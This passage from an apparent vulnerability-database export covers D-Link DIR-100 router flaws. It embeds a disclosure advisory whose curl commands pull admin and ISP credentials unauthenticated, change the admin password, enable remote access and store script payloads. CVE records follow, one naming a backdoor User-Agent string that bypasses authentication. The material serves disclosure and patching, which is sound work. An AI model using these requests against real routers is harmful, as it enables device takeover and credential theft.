"data": "D-Link DIR-100 Contains a cross-site scripting vulnerability.The information may be obtained and the information may be altered. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. D-Link DIR-100 Ethernet Broadband Router fails to properly filter the input of static IP address tags or scheduling tags, allowing remote attackers to exploit vulnerabilities to build malicious URIs, entice users to resolve, obtain sensitive cookies, hijack sessions or on the client side. Malicious operation on. D-Link DIR-100 is prone to the following security vulnerabilities:\n1. An authentication-bypass vulnerability\n2. Multiple information-disclosure vulnerabilities\n3. A cross-site request-forgery vulnerability\n4. A cross-site scripting vulnerability\nAn attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass-authentication mechanism, gain access to potentially sensitive information. Other attacks are also possible. * Title: Router D-Link DIR-100 Multiple Vulnerabilities\n* Date: 2013-12-18\n* Author: Felix Richter\n* Contact: root@euer.krebsco.de\n* Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip\n* Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip\n* Report Version: 2.0\n* Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt\n* Vulnerable: D-Link DIR-100\n * Hardware Revision: D1\n * Software Version: 4.03B07 (from 2012-04-10)\n* CVE Numbers: \n * CWE-287 Authentication Issues: CVE-2013-7051\n * CWE-255 Issues with Credential Management: CVE-2013-7052\n * CWE-352 Cross-Site Request Forgery: CVE-2013-7053\n * CWE-79 Cross-Site Scripting: CVE-2013-7054\n * CWE-200 Information Disclosure: CVE-2013-7055\n* Google Dork: \"D-Link Systems\" inurl:bsc_internet.htm D1\n* State: Patched by Vendor\n* Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8\n\n# Table of Contents\n\n 1. Background\n 2. Technical Description\n 4. Severity and Remediation\n 5. Timeline\n\n# 1. Background\n\nThe DIR-100 is designed for easy and robust connectivity among heterogeneous\nstandards-based network devices. Computers can communicate directly with this\nrouter for automatic opening and closing of UDP/TCP ports to take full\nadvantage of the security provided without sacrificing functionality of on-line\napplications. \n\n# 2 Vulnerability Description\n\nMultiple vulnerabilities have been found in the D-Link DIR-100 Ethernet\nBroadband Router Revision D (and potentially other devices sharing the \naffected firmware) that could allow a remote attacker:\n\n - Retrieve the Administrator password without authentication leading to\n authentication bypass [CWE-255]\n - Retrieve sensitive configuration paramters like the pppoe username and\n password without authentication [CWE-200]\n - Execute privileged Commands without authentication through a race\n condition leading to weak authentication enforcement [CWE-287]\n - Sending formatted request to a victim which then will execute arbitrary\n commands on the device (CSRF) [CWE-352]\n - Store arbitrary javascript code which will be executed when a victim\n accesses the administrator interface [CWE-79]\n\nCVE-Numbers for these vulnerabilities has not yet been assigned. \n\n# 3 Technical Description of the Vulnerabilities\n\n## 3.0 The DIR-100 Web Interface and CGI\n\nThe DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for\nunauthenticated users and `/cli.cgi` for authenticated requests. \n\nlist of features provided by each cgi-script can be retrieved by:\n\n curl \u0027http://192.168.1.104/cliget.cgi?cmd=help\u0027\n # and respectively when authenticated\n curl \u0027http://192.168.1.104/cli.cgi?cmd=help\u0027\n\n## 3.1 Authentication Bypass\n\n### Description\n\nThe administrator password is not protected in any way on the device, every\nattacker with access to the administrator interface which listens on port 80. \nFor retrieving the Administrator password the request must not be\nauthenticated. \n\n\n### Proof of Concept\n\nThe web interface provides two distinct ways to retrieve the adminstrator\npassword:\n\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$sys_user1\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary\u0027\n\n## 3.2 Weak Authentication\n\n### Description\n\nAs soon as a user is logged into the administration interface, the cli CGI\nis `unlocked` and can be used by without authenticating before as\nthe cgi-script does not check any other authentication parameters such as\ncookies or HTTP Parameters. The only access check is if the IP-Address is \nthe same. \n\n### Proof of Concept\n \n # open the router interface in a web browser and log in\n firefox \u0027http://192.168.0.1/\u0027 \n \n # open a new terminal or another web-browser which is currently not logged\n # in and try to access\n\n curl \u0027http://192.168.0.1/cli.cgi?cmd=help\u0027\n\n # this request will be authenticated and it will not be redirected to the\n # login page. If no user is logged in, the request will be redirected to\n # the login \n\n## 3.3 Retrieve sensitive information\n\n### Description\n\nBesides retrieving the administrator password without authentication it is\npossible to retrieve other sensitive configuration from the device as well like\nthe PPTP and poe Username and Password, as well as the configured dyndns\nusername and password and configured mail log credentials when these parameters\nare configured. \nNo authentication is requred. \n\n### Proof of Concept\n\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$ddns1\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$poe_user\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$poe_pass\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$pptp_user\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$pptp_pass\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$log_mail_user\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd\u0027\n\n## 3.4 Cross-Site Request Forgery (CSRF)\n\n### Description\n\nCSRF attacks can be launched by sending a formatted request to a victim, then\ntricking the victim into loading the request (often automatically), which\nmakes it appear that the request came from the victim. As an example the\nattacker could change the administrator password (see Proof of Concept code)\nand enable system remote access. \n\n### Proof of Concept\n\nChanging the password for administrator can be done when the ip-address is\nauthenticated:\n\n # Log into DIR-100\n curl -X POST -d \u0027uname=admin\u0026pws=password\u0026login=Login\u0027 \u0027http://192.168.0.1/login.htm\u0027\n\n # Change password\n curl \u0027http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin\u0026pass=c%;$sys_passHash=4%25;commit\u0027\n\n # enable remote console\n curl \u0027http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit\u0027\n\n## 3.5 Cross-Site Scripting (XSS)\n\n### Description\n\nIt is possible for an authenticated user to store information on the server\nwhich will not be checked on the server side for special characters which\nresults in persistent Cross-Site Scripting Vulnerabilities. With this\nvulnerabilty the victim (administrator) will run javascript code in the \ncontext of the D-Link DIR-100. \n\nXSS is possible because only on the client side (javascript code) the input is\nfiltered and validated, sending data directly to the CGI scripts. \n\n### Proof of Concept\n\n # Log into DIR-100\n curl -X POST -d \u0027uname=admin\u0026pws=password\u0026login=Login\u0027 \u0027http://192.168.0.1/login.htm\u0027\n\n # XSS in Static IP Address Tab\n curl \u0027http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=\u003cscript\u003ealert(1)\u003c/script\u003e%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp=\u0027\n\n # XSS in Scheduler tab\n curl \u0027http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=\u003cscript\u003ealert(1)\u003c/script\u003e%26use=0%26idx=2%26;commit\u0027\n\n# 4 Severity and Remediation\n\nThis exploits are considered very critical, especially when the feature of remote\nadministration is activated on the system. \nWeak authentication, together with cross-site request forgery and authentication \nbypass can result in a full device compromise from an arbitrary website the victim is\naccessing, even if the device has remote administration deactivated on the\ninternet-port. It is recommended to upgrade the router with the newest firmware\nof the D-Link DIR-100. \n\n# 5 Timeline\n\n2013-09-13 - First Contact with D-Link Support\n2013-09-19 - Sent Report\n2013-10-14 - Request Status update, Response: Beta will be available mid October\n2013-12-02 - Vendor publishes Firmware Update \n2013-12-11 - Request CVE-IDs\n2013-12-18 - Publish the report\n",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007142"
},
{
"db": "CNVD",
"id": "CNVD-2014-01478"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "PACKETSTORM",
"id": "125041"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-7054",
"trust": 3.4
},
{
"db": "BID",
"id": "65290",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007142",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2014-01478",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202002-035",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "125041",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01478"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007142"
},
{
"db": "PACKETSTORM",
"id": "125041"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-035"
},
{
"db": "NVD",
"id": "CVE-2013-7054"
}
]
},
"id": "VAR-202002-0669",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01478"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01478"
}
]
},
"last_update_date": "2024-11-23T21:36:11.475000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "http://www.dlink.lt/en/"
},
{
"title": "D-Link DIR-100 has multiple patches for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/44084"
},
{
"title": "D-Link DIR-100 Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=107307"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01478"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007142"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-035"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.0
},
{
"problemtype": "Cross-site scripting (CWE-79) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007142"
},
{
"db": "NVD",
"id": "CVE-2013-7054"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90906"
},
{
"trust": 2.3,
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"trust": 1.6,
"url": "https://www.securityfocus.com/bid/65290/info"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7054"
},
{
"trust": 0.4,
"url": "http://more.dlink.de/sicherheit/news.html#news8"
},
{
"trust": 0.3,
"url": "http://www.dlink.com/"
},
{
"trust": 0.3,
"url": "http://seclists.org/fulldisclosure/2014/feb/4"
},
{
"trust": 0.1,
"url": "http://192.168.1.104/cli.cgi?cmd=help\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$pptp_user\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$pptp_pass\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7052"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$log_mail_user\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7051"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=\u003cscript\u003ealert(1)\u003c/script\u003e%26use=0%26idx=2%26;commit\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.1.104/cliget.cgi?cmd=help\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$sys_user1\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/login.htm\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7053"
},
{
"trust": 0.1,
"url": "http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=\u003cscript\u003ealert(1)\u003c/script\u003e%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp=\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7055"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$poe_user\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin\u0026pass=c%;$sys_passhash=4%25;commit\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$poe_pass\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$ddns1\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cli.cgi?cmd=help\u0027"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01478"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007142"
},
{
"db": "PACKETSTORM",
"id": "125041"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-035"
},
{
"db": "NVD",
"id": "CVE-2013-7054"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-01478"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007142"
},
{
"db": "PACKETSTORM",
"id": "125041"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-035"
},
{
"db": "NVD",
"id": "CVE-2013-7054"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-03-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01478"
},
{
"date": "2013-12-03T00:00:00",
"db": "BID",
"id": "65290"
},
{
"date": "2020-02-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007142"
},
{
"date": "2014-02-03T23:36:22",
"db": "PACKETSTORM",
"id": "125041"
},
{
"date": "2020-02-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202002-035"
},
{
"date": "2020-02-04T14:15:12.340000",
"db": "NVD",
"id": "CVE-2013-7054"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-03-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01478"
},
{
"date": "2013-12-03T00:00:00",
"db": "BID",
"id": "65290"
},
{
"date": "2020-02-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007142"
},
{
"date": "2022-07-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202002-035"
},
{
"date": "2024-11-21T02:00:14.943000",
"db": "NVD",
"id": "CVE-2013-7054"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202002-035"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0DIR-100\u00a0 Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007142"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202002-035"
}
],
"trust": 0.6
}
}
cve-2013-6026
Vulnerability from cvelistv5
Published
2013-10-19 10:00
Modified
2024-09-16 23:50
Severity ?
EPSS score ?
Summary
The web interface on D-Link DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+, and TM-G5240 routers; Planex BRL-04R, BRL-04UR, and BRL-04CW routers; and Alpha Networks routers allows remote attackers to bypass authentication and modify settings via an xmlset_roodkcableoj28840ybtide User-Agent HTTP header, as exploited in the wild in October 2013.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/ | x_refsource_MISC | |
| http://www.dlink.com/uk/en/support/security | x_refsource_CONFIRM | |
| http://www.kb.cert.org/vuls/id/248083 | third-party-advisory, x_refsource_CERT-VN |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:29:42.729Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.dlink.com/uk/en/support/security"
},
{
"name": "VU#248083",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/248083"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The web interface on D-Link DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+, and TM-G5240 routers; Planex BRL-04R, BRL-04UR, and BRL-04CW routers; and Alpha Networks routers allows remote attackers to bypass authentication and modify settings via an xmlset_roodkcableoj28840ybtide User-Agent HTTP header, as exploited in the wild in October 2013."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2013-10-19T10:00:00Z",
"orgId": "37e5125f-f79b-445b-8fad-9564f167944b",
"shortName": "certcc"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.dlink.com/uk/en/support/security"
},
{
"name": "VU#248083",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/248083"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cert@cert.org",
"ID": "CVE-2013-6026",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The web interface on D-Link DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+, and TM-G5240 routers; Planex BRL-04R, BRL-04UR, and BRL-04CW routers; and Alpha Networks routers allows remote attackers to bypass authentication and modify settings via an xmlset_roodkcableoj28840ybtide User-Agent HTTP header, as exploited in the wild in October 2013."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/",
"refsource": "MISC",
"url": "http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/"
},
{
"name": "http://www.dlink.com/uk/en/support/security",
"refsource": "CONFIRM",
"url": "http://www.dlink.com/uk/en/support/security"
},
{
"name": "VU#248083",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/248083"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "37e5125f-f79b-445b-8fad-9564f167944b",
"assignerShortName": "certcc",
"cveId": "CVE-2013-6026",
"datePublished": "2013-10-19T10:00:00Z",
"dateReserved": "2013-10-04T00:00:00Z",
"dateUpdated": "2024-09-16T23:50:32.878Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2013-6027
Vulnerability from cvelistv5
Published
2013-10-19 10:00
Modified
2024-09-16 22:46
Severity ?
EPSS score ?
Summary
Stack-based buffer overflow in the RuntimeDiagnosticPing function in /bin/webs on D-Link DIR-100 routers might allow remote authenticated administrators to execute arbitrary commands via a long set/runtime/diagnostic/pingIp parameter to Tools/tools_misc.xgi.
References
| ▼ | URL | Tags |
|---|---|---|
| http://pastebin.com/raw.php?i=vbiG42VD | x_refsource_MISC | |
| http://www.kb.cert.org/vuls/id/248083 | third-party-advisory, x_refsource_CERT-VN |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:29:42.706Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://pastebin.com/raw.php?i=vbiG42VD"
},
{
"name": "VU#248083",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/248083"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Stack-based buffer overflow in the RuntimeDiagnosticPing function in /bin/webs on D-Link DIR-100 routers might allow remote authenticated administrators to execute arbitrary commands via a long set/runtime/diagnostic/pingIp parameter to Tools/tools_misc.xgi."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2013-10-19T10:00:00Z",
"orgId": "37e5125f-f79b-445b-8fad-9564f167944b",
"shortName": "certcc"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://pastebin.com/raw.php?i=vbiG42VD"
},
{
"name": "VU#248083",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/248083"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cert@cert.org",
"ID": "CVE-2013-6027",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Stack-based buffer overflow in the RuntimeDiagnosticPing function in /bin/webs on D-Link DIR-100 routers might allow remote authenticated administrators to execute arbitrary commands via a long set/runtime/diagnostic/pingIp parameter to Tools/tools_misc.xgi."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://pastebin.com/raw.php?i=vbiG42VD",
"refsource": "MISC",
"url": "http://pastebin.com/raw.php?i=vbiG42VD"
},
{
"name": "VU#248083",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/248083"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "37e5125f-f79b-445b-8fad-9564f167944b",
"assignerShortName": "certcc",
"cveId": "CVE-2013-6027",
"datePublished": "2013-10-19T10:00:00Z",
"dateReserved": "2013-10-04T00:00:00Z",
"dateUpdated": "2024-09-16T22:46:38.010Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2013-7051
Vulnerability from cvelistv5
Published
2020-02-04 13:46
Modified
2024-08-06 17:53
Severity ?
EPSS score ?
Summary
D-Link DIR-100 4.03B07: cli.cgi security bypass due to failure to check authentication parameters
References
| ▼ | URL | Tags |
|---|---|---|
| http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt | x_refsource_MISC | |
| http://www.exploit-db.com/exploits/31425 | x_refsource_MISC | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/90904 | x_refsource_MISC | |
| https://www.securityfocus.com/bid/65290 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:53:46.104Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.exploit-db.com/exploits/31425"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90904"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.securityfocus.com/bid/65290"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "D-Link DIR-100 4.03B07: cli.cgi security bypass due to failure to check authentication parameters"
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-02-04T13:46:03",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.exploit-db.com/exploits/31425"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90904"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.securityfocus.com/bid/65290"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-7051",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "D-Link DIR-100 4.03B07: cli.cgi security bypass due to failure to check authentication parameters"
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt",
"refsource": "MISC",
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"name": "http://www.exploit-db.com/exploits/31425",
"refsource": "MISC",
"url": "http://www.exploit-db.com/exploits/31425"
},
{
"name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90904",
"refsource": "MISC",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90904"
},
{
"name": "https://www.securityfocus.com/bid/65290",
"refsource": "MISC",
"url": "https://www.securityfocus.com/bid/65290"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-7051",
"datePublished": "2020-02-04T13:46:03",
"dateReserved": "2013-12-11T00:00:00",
"dateUpdated": "2024-08-06T17:53:46.104Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2013-7055
Vulnerability from cvelistv5
Published
2020-02-04 13:56
Modified
2024-08-06 17:53
Severity ?
EPSS score ?
Summary
D-Link DIR-100 4.03B07 has PPTP and poe information disclosure
References
| ▼ | URL | Tags |
|---|---|---|
